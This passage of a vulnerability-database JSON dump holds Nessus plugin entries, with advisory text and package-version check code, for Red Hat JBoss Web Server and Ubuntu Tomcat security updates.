\"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"libtomcat6-java\", pkgver:\"6.0.35-1ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"tomcat6\", pkgver:\"6.0.35-1ubuntu3.8\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"libtomcat7-java\", pkgver:\"7.0.52-1ubuntu0.7\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"tomcat7\", pkgver:\"7.0.52-1ubuntu0.7\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"libtomcat8-java\", pkgver:\"8.0.32-1ubuntu1.2\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"tomcat8\", pkgver:\"8.0.32-1ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n 
exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libtomcat6-java / libtomcat7-java / libtomcat8-java / tomcat6 / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:21:22", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Web Server 3 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. 
(CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0456.NASL", "href": "https://www.tenable.com/plugins/nessus/97596", "published": "2017-03-08T00:00:00", "title": "RHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0456. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97596);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-0762\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-5018\", \"CVE-2016-6325\", \"CVE-2016-6794\", \"CVE-2016-6796\", \"CVE-2016-6797\", \"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0456\");\n\n script_name(english:\"RHEL 7 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0456)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3 for RHEL 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only\nincluded in EWS 2.x and JWS 3.x source distributions. If you deploy a\nTomcat instance built from source, using the EWS 2.x, or JWS 3.x\ndistributions, an attacker could use this flaw to launch a remote code\nexecution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons\nFileUpload that occurred when the length of the multipart boundary was\njust below the size of the buffer (4096 bytes) used to read the\nuploaded file if the boundary was the typical tens of bytes long.\n(CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. 
(CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if\nthe supplied user name did not exist. This made a timing attack\npossible to determine valid user names. Note that the default\nconfiguration includes the LockOutRealm which makes exploitation of\nthis vulnerability harder. (CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via a Tomcat utility method that was\naccessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's\nsystem property replacement feature for configuration files could be\nused by a malicious web application to bypass the SecurityManager and\nread system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via manipulation of the configuration\nparameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to\naccess any global JNDI resource whether an explicit ResourceLink had\nbeen configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s) :\n\n* This enhancement update adds the Red Hat JBoss Web Server 3.1.0\npackages to Red Hat Enterprise Linux 7. These packages provide a\nnumber of enhancements over the previous version of Red Hat JBoss Web\nServer. 
(JIRA#JWS-268)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0456\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8745\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-c3p0-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbcs-httpd24-runtime\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mod_cluster-tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-native-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat-vault\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-log4j\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat7-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsp-2.3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-log4j\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-selinux\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-servlet-3.1-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:tomcat8-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/07/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:0456\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-c3p0-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-core-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-entitymanager-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"hibernate4-envers-eap6-4.2.23-1.Final_redhat_1.1.ep6.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-apache-commons-daemon-1.0.15-1.redhat_2.1.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-1.0.15-17.redhat_2.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"jbcs-httpd24-apache-commons-daemon-jsvc-debuginfo-1.0.15-17.redhat_2.jbcs.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"jbcs-httpd24-runtime-1-3.jbcs.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", reference:\"mod_cluster-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"mod_cluster-tomcat7-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"mod_cluster-tomcat8-1.3.5-2.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-1.2.8-9.redhat_9.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"tomcat-native-debuginfo-1.2.8-9.redhat_9.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat-vault-1.0.8-9.Final_redhat_2.1.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-admin-webapps-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-docs-webapp-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-el-2.2-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-javadoc-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsp-2.2-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-jsvc-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-lib-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-log4j-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-selinux-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-servlet-3.0-api-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat7-webapps-7.0.70-16.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-admin-webapps-8.0.36-17.ep7.el7\")) flag++;\n if 
(rpm_check(release:\"RHEL7\", reference:\"tomcat8-docs-webapp-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-el-2.2-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-javadoc-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsp-2.3-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-jsvc-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-lib-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-log4j-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-selinux-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-servlet-3.1-api-8.0.36-17.ep7.el7\")) flag++;\n if (rpm_check(release:\"RHEL7\", reference:\"tomcat8-webapps-8.0.36-17.ep7.el7\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-c3p0-eap6 / hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-01T03:21:22", "bulletinFamily": "scanner", "description": "An update is now available for Red Hat JBoss Web Server 3 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. 
It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle", "modified": "2019-11-02T00:00:00", "id": "REDHAT-RHSA-2017-0455.NASL", "href": "https://www.tenable.com/plugins/nessus/97595", "published": "2017-03-08T00:00:00", "title": "RHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:0455. 
The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97595);\n script_version(\"3.11\");\n script_cvs_date(\"Date: 2019/10/24 15:35:42\");\n\n script_cve_id(\"CVE-2016-0762\", \"CVE-2016-1240\", \"CVE-2016-3092\", \"CVE-2016-5018\", \"CVE-2016-6325\", \"CVE-2016-6794\", \"CVE-2016-6796\", \"CVE-2016-6797\", \"CVE-2016-6816\", \"CVE-2016-8735\", \"CVE-2016-8745\");\n script_xref(name:\"RHSA\", value:\"2017:0455\");\n\n script_name(english:\"RHEL 6 : Red Hat JBoss Web Server 3.1.0 (RHSA-2017:0455)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Web Server 3 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the\nApache HTTP Server, the Apache Tomcat Servlet container, Apache Tomcat\nConnector (mod_jk), JBoss HTTP Connector (mod_cluster), Hibernate, and\nthe Tomcat Native library.\n\nThis release of Red Hat JBoss Web Server 3.1.0 serves as a replacement\nfor Red Hat JBoss Web Server 3.0.3, and includes enhancements.\n\nSecurity Fix(es) :\n\n* It was reported that the Tomcat init script performed unsafe file\nhandling, which could result in local privilege escalation.\n(CVE-2016-1240)\n\n* It was discovered that the Tomcat packages installed certain\nconfiguration files read by the Tomcat initialization script as\nwriteable to the tomcat group. 
A member of the group or a malicious\nweb application deployed on Tomcat could use this flaw to escalate\ntheir privileges. (CVE-2016-6325)\n\n* The JmxRemoteLifecycleListener was not updated to take account of\nOracle's fix for CVE-2016-3427. JMXRemoteLifecycleListener is only\nincluded in EWS 2.x and JWS 3.x source distributions. If you deploy a\nTomcat instance built from source, using the EWS 2.x, or JWS 3.x\ndistributions, an attacker could use this flaw to launch a remote code\nexecution attack on your deployed instance. (CVE-2016-8735)\n\n* A denial of service vulnerability was identified in Commons\nFileUpload that occurred when the length of the multipart boundary was\njust below the size of the buffer (4096 bytes) used to read the\nuploaded file if the boundary was the typical tens of bytes long.\n(CVE-2016-3092)\n\n* It was discovered that the code that parsed the HTTP request line\npermitted invalid characters. This could be exploited, in conjunction\nwith a proxy that also permitted the invalid characters but with a\ndifferent interpretation, to inject data into the HTTP response. By\nmanipulating the HTTP response the attacker could poison a web-cache,\nperform an XSS attack, or obtain sensitive information from requests\nother then their own. (CVE-2016-6816)\n\n* A bug was discovered in the error handling of the send file code for\nthe NIO HTTP connector. This led to the current Processor object being\nadded to the Processor cache multiple times allowing information\nleakage between requests including, and not limited to, session ID and\nthe response body. (CVE-2016-8745)\n\n* The Realm implementations did not process the supplied password if\nthe supplied user name did not exist. This made a timing attack\npossible to determine valid user names. Note that the default\nconfiguration includes the LockOutRealm which makes exploitation of\nthis vulnerability harder. 
(CVE-2016-0762)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via a Tomcat utility method that was\naccessible to web applications. (CVE-2016-5018)\n\n* It was discovered that when a SecurityManager is configured Tomcat's\nsystem property replacement feature for configuration files could be\nused by a malicious web application to bypass the SecurityManager and\nread system properties that should not be visible. (CVE-2016-6794)\n\n* It was discovered that a malicious web application could bypass a\nconfigured SecurityManager via manipulation of the configuration\nparameters for the JSP Servlet. (CVE-2016-6796)\n\n* It was discovered that it was possible for a web application to\naccess any global JNDI resource whether an explicit ResourceLink had\nbeen configured or not. (CVE-2016-6797)\n\nThe CVE-2016-6325 issue was discovered by Red Hat Product Security.\n\nEnhancement(s) :\n\nThis enhancement update adds the Red Hat JBoss Web Server 3.1.0\npackages to Red Hat Enterprise Linux 6. These packages provide a\nnumber of enhancements over the previous version of Red Hat JBoss Web\nServer. 
(JIRA#JWS-267)\n\nUsers of Red Hat JBoss Web Server are advised to upgrade to these\nupdated packages, which add this enhancement.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:0455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0762\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-1240\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-3092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-5018\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6325\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6794\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6796\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6797\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-6816\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-8745\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", 
